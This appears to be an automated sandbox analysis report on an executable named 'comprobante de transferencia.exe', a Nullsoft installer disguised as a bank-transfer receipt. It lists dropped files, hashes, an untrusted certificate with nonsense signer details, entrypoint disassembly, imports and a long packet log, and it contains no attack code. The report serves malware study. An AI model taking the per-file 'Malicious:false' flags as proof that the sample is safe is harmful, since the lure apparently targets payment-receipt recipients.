                                          Preview:...........ss.....jjjj....III.................r........................EEEEE..g...}......<...))..........3..................................................f...f......:p..9..............................................................=............................................................r<.......F...m::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::4.f......_..44................................................................................................f....k...v(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((.....h...h..Mnx.Tqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqf........Z...J$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......f.s...>..(IYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY...........bnM.hpppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp...f.s.=.HP..BNNNNNNNNN
                                          Process:C:\Users\user\Desktop\comprobante de transferencia.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):272352
                                          Entropy (8bit):3.2380792387673005
                                          Encrypted:false
                                          SSDEEP:3072:9wrIYjPjPwOv1ccOX2vCXCdj4w8JJ3WkPd+Eix/j8lQ1KpB:9lYjTwOdccNCup8JJLP8EiF8lB
                                          MD5:93A04CCDF51474B877C9414AE5AD2760
                                          SHA1:1321C10A4CC69A33235C87ABF2779A57619533BB
                                          SHA-256:D9DCAF7157CB66EFE264672D39EA0D004DD2CECDAC777BDB857509AEDDF040FF
                                          SHA-512:675C752DEDAD08A6BBBB976A3E26F03D54B1AF4DDA84999B7749D8DB67BA01E1488CC92AFB5C769A5B4BE3DD67B6AC0038D9062CD8DDEB025E9493241038DB2D
                                          Malicious:false
                                          Preview:..........................................................................&....\..................+.\.......8.@.......+...?d.."...B.............................;....................:..6.....f......h...................n...L.....................m..........$...................4...........Yf.......................+.......P......'..u...........4.......S....K*......!.........1h.....'........................F........AJQ.........P.......k.........8.......Z...B......Z#c........h.....................U.......a....j.......e..!~..C....n!..8.......B........................-...f......y.q.....,....Y........i.........1..~.....c................cQ..............g.z..........................................X........}..........................V.........8...............p....Q..f. .............................^.....).............................o..........^............?......8........................4......................X...........................7S.....O..................p......>......................
                                          Process:C:\Users\user\Desktop\comprobante de transferencia.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):207086
                                          Entropy (8bit):3.2412864519720883
                                          Encrypted:false
                                          SSDEEP:3072:/xOtUWnnPV6AtPH2oDGzK6jQoplsYXzYl:/xvE6Afw5jQoplLYl
                                          MD5:1171715CBB2206BFF607138FEF73877F
                                          SHA1:D7059E4A741A345239A17FE037C8605D4219E28C
                                          SHA-256:27A8BF54AD65E1DC2C3C88BE4A56792C4960365F12BFF185676D0D4966AE3B31
                                          SHA-512:69449053EAD94E7B0894729E3608F767D8E53775300F876EEC04712C653580EFCEE192BB64EE4A5D10A3B4648351DD0DCB4661F8EB62199BC92B661967ABDB4E
                                          Malicious:false
                                          Preview:...F...$>..........$.K...\.........................'M.......G.......h...4....4..............85......o.}..........e....................<.............H..........l.....DY...c...........N...6...]...n..............................2..q..I....W....................8........-.......2...K..............J..%<.....O..]...m.......H.......z..........................9s........!......s..8.................u..............y.gS................v...`...........a........Q...... .....................j............G...........~.................... ................b.........q...v............p..............S..........{.............c.......#!..........;...................=6.R...1.....6.....t.9...........9....4................9..p.....Y...0..........|...........U..........,......W...~.......d.&.......k{.B.......r......3...w.:..[.^$_...........s.........)....,l..P..........9......{........b......................y...u..C............/..............d..:..............................6.>.#.......>.I2.y.............
                                          Process:C:\Users\user\Desktop\comprobante de transferencia.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):453
                                          Entropy (8bit):4.317248216463251
                                          Encrypted:false
                                          SSDEEP:12:pUVo0WmtKoENHeo6fAy/22Xe7V9Ec/BZMIjbAl4WOE:KjKb9Vyul59JXehn
                                          MD5:9F716DE9908957BD324DCC4ADA5A33F7
                                          SHA1:5AA93CFD2DF40B9ED1F46A728EEE203258DC05DD
                                          SHA-256:CDBC11AE1032690D95484A15A78C94AECFEE10103E26372894547D7B25C01A94
                                          SHA-512:0C47E325FD292F1E782B69F985A92336D1F0DF39E8C0902389F81BB6E7CE212968EF6EA9ABCBE2C8B9869021A9095B868E93AF51EBF8085596FCC5B05E35F237
                                          Malicious:false
                                          Preview:reaudition bancal scalelike boligaktivister uninstructedness..tankers befragternes unfoggy snowmaker ectrodactylia leachier..gopherman ultrarapidt ichthyosis repine leniencies mistreading..supergravitated indlemning rhinoceroses hjaelpelaerere dizzies spndkraft kopskifte reenlargement backtack tylosoid..brevpakkernes foderautomaten supersarcasm lystrede whiteheart teratogenous.fetology uneddied archprimate pilotprojekters slovakish pseudoassertive..
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.986983955561028
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:comprobante de transferencia.exe
                                          File size:800'824 bytes
                                          MD5:8a1422827315b9db63cd6b399a454fab
                                          SHA1:235c6e8149097f00ac26e70b0022c7b5a2f49c1d
                                          SHA256:2d49a4fcfdf17af26d78ec4eea4eb75176ab9918c7644855d4d80454ce7382c0
                                          SHA512:1d48248911e937157eb2147456e7ff508936257916412533ef1c80a2b9f67790f46f178b28014b17d73a3727653b3f26228952cd2802c90800760a74959aae66
                                          SSDEEP:12288:nqLWnK6qSn2bcfB/5FsfecOs8c3ObwMB8aqEEbViGCyQRy1/6dzgA6zZxfb5R9A:8WnVD5h5FoFJBoZyQqNbbfNQ
                                          TLSH:8A0523261283A041F9E584F54AD7B336DD70A7D94136EB0E6F751ABA2504B22CF243BF
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....c.W.................`...*......j2.......p....@
                                          Icon Hash:3d2e0f95332b3399
                                          Entrypoint:0x40326a
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x57956391 [Mon Jul 25 00:55:45 2016 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:e2a592076b17ef8bfb48b7e03965a3fc
                                          Signature Valid:false
                                          Signature Issuer:E=Dwarves@eksportmarkeder.Tri, O=Kongefloderne, OU="Palaeodendrologist Linated ", CN=Kongefloderne, L=Leivasy, S=West Virginia, C=US
                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                          Error Number:-2146762487
                                          Not Before, Not After
                                          • 05/02/2024 04:48:36 04/02/2027 04:48:36
                                          Subject Chain
                                          • E=Dwarves@eksportmarkeder.Tri, O=Kongefloderne, OU="Palaeodendrologist Linated ", CN=Kongefloderne, L=Leivasy, S=West Virginia, C=US
                                          Version:3
                                          Thumbprint MD5:A84745518FBDCF236D8B362BDC042931
                                          Thumbprint SHA-1:EF6135327AF598B98077D3B6778630318A274FCA
                                          Thumbprint SHA-256:57AB6697E2DF0E8CA942FF7C261CB088CB53666DBA46EF8052FA83F02D970B2D
                                          Serial:4714A48C7EED8FC800CFB1095DD34591AD152D1B
                                          Instruction
                                          sub esp, 000002D4h
                                          push ebx
                                          push esi
                                          push edi
                                          push 00000020h
                                          pop edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+14h], ebx
                                          mov dword ptr [esp+10h], 004092E0h
                                          mov dword ptr [esp+1Ch], ebx
                                          call dword ptr [004070B0h]
                                          call dword ptr [004070ACh]
                                          cmp ax, 00000006h
                                          je 00007F4780ADDDE3h
                                          push ebx
                                          call 00007F4780AE0F24h
                                          cmp eax, ebx
                                          je 00007F4780ADDDD9h
                                          push 00000C00h
                                          call eax
                                          mov esi, 004072B8h
                                          push esi
                                          call 00007F4780AE0E9Eh
                                          push esi
                                          call dword ptr [0040715Ch]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], 00000000h
                                          jne 00007F4780ADDDBCh
                                          push ebp
                                          push 00000009h
                                          call 00007F4780AE0EF6h
                                          push 00000007h
                                          call 00007F4780AE0EEFh
                                          mov dword ptr [00429204h], eax
                                          call dword ptr [0040703Ch]
                                          push ebx
                                          call dword ptr [004072A4h]
                                          mov dword ptr [004292B8h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+34h]
                                          push 000002B4h
                                          push eax
                                          push ebx
                                          push 004206A8h
                                          call dword ptr [00407188h]
                                          push 004092C8h
                                          push 00428200h
                                          call 00007F4780AE0AD8h
                                          call dword ptr [004070A8h]
                                          mov ebp, 00434000h
                                          push eax
                                          push ebp
                                          call 00007F4780AE0AC6h
                                          push ebx
                                          call dword ptr [00407174h]
                                          add word ptr [eax], 0000h
                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x75040xa0.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x670000xb48.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0xc1d200x1b18
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b4.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x5ff90x600034f0469eb860d5ecf0e52ef9d3820a60False0.6667073567708334data6.4734859396670705IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x70000x13a40x1400848ecd58951d0a4cfe8ec8cfce6b20d1False0.452734375data5.125569346027248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x90000x202f80x6003953dbb7217e7539ee75e90871f7aef9False0.4947916666666667data3.9050018847265378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .ndata0x2a0000x3d0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x670000xb480xc00737bf22e330f1bb677a1a75bfb3076c2False0.4215494791666667data4.359435247089545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0x671c00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                          RT_DIALOG0x674a80x100dataEnglishUnited States0.5234375
                                          RT_DIALOG0x675a80x11cdataEnglishUnited States0.6056338028169014
                                          RT_DIALOG0x676c80xc4dataEnglishUnited States0.5918367346938775
                                          RT_DIALOG0x677900x60dataEnglishUnited States0.7291666666666666
                                          RT_GROUP_ICON0x677f00x14dataEnglishUnited States1.2
                                          RT_MANIFEST0x678080x33dXML 1.0 document, ASCII text, with very long lines (829), with no line terminatorsEnglishUnited States0.5536791314837153
                                          DLLImport
                                          KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                          USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                          ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States
                                          TimestampSource PortDest PortSource IPDest IP
                                          Mar 18, 2024 15:06:44.187952995 CET49784443192.168.11.20142.251.40.142
                                          Mar 18, 2024 15:06:44.187973022 CET44349784142.251.40.142192.168.11.20
                                          Mar 18, 2024 15:06:44.188138008 CET49784443192.168.11.20142.251.40.142
                                          Mar 18, 2024 15:06:44.201850891 CET49784443192.168.11.20142.251.40.142
                                          Mar 18, 2024 15:06:44.201879978 CET44349784142.251.40.142192.168.11.20
                                          Mar 18, 2024 15:06:44.484978914 CET44349784142.251.40.142192.168.11.20
                                          Mar 18, 2024 15:06:44.485115051 CET49784443192.168.11.20142.251.40.142
                                          Mar 18, 2024 15:06:44.485192060 CET49784443192.168.11.20142.251.40.142
                                          Mar 18, 2024 15:06:44.485944986 CET44349784142.251.40.142192.168.11.20
                                          Mar 18, 2024 15:06:44.486078978 CET49784443192.168.11.20142.251.40.142
                                          Mar 18, 2024 15:06:44.554874897 CET49784443192.168.11.20142.251.40.142
                                          Mar 18, 2024 15:06:44.554883003 CET44349784142.251.40.142192.168.11.20
                                          Mar 18, 2024 15:06:44.555110931 CET44349784142.251.40.142192.168.11.20
                                          Mar 18, 2024 15:06:44.555238008 CET49784443192.168.11.20142.251.40.142
                                          Mar 18, 2024 15:06:44.558010101 CET49784443192.168.11.20142.251.40.142
                                          Mar 18, 2024 15:06:44.600605011 CET44349784142.251.40.142192.168.11.20
                                          Mar 18, 2024 15:06:44.779589891 CET44349784142.251.40.142192.168.11.20
                                          Mar 18, 2024 15:06:44.779712915 CET44349784142.251.40.142192.168.11.20
                                          Mar 18, 2024 15:06:44.779764891 CET49784443192.168.11.20142.251.40.142
                                          Mar 18, 2024 15:06:44.779843092 CET49784443192.168.11.20142.251.40.142
                                          Mar 18, 2024 15:06:44.781260014 CET49784443192.168.11.20142.251.40.142
                                          Mar 18, 2024 15:06:44.781271935 CET44349784142.251.40.142192.168.11.20
                                          Mar 18, 2024 15:06:44.915218115 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:44.915245056 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:44.915505886 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:44.916095018 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:44.916110039 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.127846003 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.128058910 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.128058910 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.133785963 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.133801937 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.134341955 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.134496927 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.134900093 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.176569939 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.675909996 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.676068068 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.676068068 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.676115036 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.682615042 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.682786942 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.682786942 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.682807922 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.695477009 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.695689917 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.702162027 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.702435017 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.770195007 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.770525932 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.770538092 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.770778894 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.773463964 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.773689985 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.773700953 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.773931980 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.780162096 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.780375957 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.780388117 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.780548096 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.786660910 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.786874056 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.786886930 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.787144899 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.793369055 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.793581963 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.793595076 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.793829918 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.799920082 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.800132036 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.800143957 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.800334930 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.806499004 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.806710958 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.806723118 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.806974888 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.813143969 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.813385963 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.813397884 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.813592911 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.819250107 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.819451094 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.819463968 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.819662094 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.825200081 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.825402021 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.825413942 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.825630903 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.831336021 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.831541061 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.831553936 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.831763029 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.837760925 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.838001013 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.838057041 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.838293076 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.843724966 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.843961954 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.846930027 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.847178936 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.847239971 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.847485065 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.847542048 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.847801924 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.865192890 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.865421057 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.865478039 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.865684032 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.867501020 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.867744923 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.867801905 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.868036985 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.872294903 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.872545004 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.872626066 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.872886896 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.876513004 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.876708031 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.876770973 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.877055883 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.880790949 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.881032944 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.881122112 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.881319046 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.885081053 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.885274887 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.885338068 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.885535955 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.885575056 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.885740995 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.889368057 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.889564991 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.889628887 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.889897108 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.893570900 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.893750906 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.893815994 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.894057989 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.897949934 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.898134947 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.898197889 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.898396969 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.902143955 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.902331114 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.902396917 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.902628899 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.906441927 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.906650066 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.906713963 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.906960011 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.910645962 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.910881042 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.912985086 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.913162947 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.913248062 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.913438082 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.917172909 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.917407036 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.917479992 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.917635918 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.921381950 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.921591043 CET49785443192.168.11.20142.251.41.1
